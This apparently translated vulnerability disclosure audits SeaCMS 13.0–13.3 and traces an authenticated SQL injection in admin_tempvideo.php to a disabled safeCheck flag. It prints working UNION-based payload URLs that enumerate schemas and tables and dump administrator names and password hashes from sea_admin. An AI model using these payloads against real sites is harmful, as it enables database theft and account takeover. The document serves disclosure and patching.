Seacms V13.3 has a SQL injection vulnerability that allows an authenticated attacker to exploit the database.

Download：https://www.seacms.com/download/

*Affected versions: 13.0-13.3*

Demo Version: 13.3

Code Audit Process

Open Backstage admin_tempvideo.php

Going back to the included config configuration file, you can pass parameters

Let action = import

However, $e_id controls$ids, so the parameters are controllable

Then follow the execution of the sql statement to see if there are any restrictions

This one doesn't have

The developer commented here that there is a safety check, so see if the value of safeCheck is true or false

Go up

It is found that when sql is initialized, it is assigned to true

However, it is also found that the included config configuration file assigns safeCheck to false

Therefore, admin_tempvideo.php calls the sql object in config.php, and the value changes from false to true, so the parameters are not filtered.

Therefore, the sql statement is constructed. Here, $e_id has implode and is bypassed by using an array.

Payload:

/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,3,4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111

There is an echo here

Try to modify the data in 3 and execute as follows

Found that the echo was successful, and then started

KULOOD VIOLENCE

Payload:

/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,(select+group_concat(schema_name)+from+information_schema.schemata),4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111

OUT OF THIS POINT

I found that there was no echo, which should be an error.

I printed the sql statement at the execution point and found that ' " was moved.

So I used coding to bypass it.

Payload:

/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,(select+group_concat(table_name)+from+information_schema.tables+where+table_schema=0x736561636D73312E33),4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111

Explosive Value

Payload:

/9k8q3d/admin_tempvideo.php?action=import&e_id[]=-1)union+select+1,2,(select+group_concat(name,0x3a,password)+from+sea_admin),4,5,6,7,8,10,11,12,13,14,15,16,17%23&type=111

End

All the data in the database can be obtained from now on

This version is seacms 13.3

The same is true when testing version 13.0, that is, 13.0 also has the same vulnerability

Therefore****Affects versions 13.0-13.3****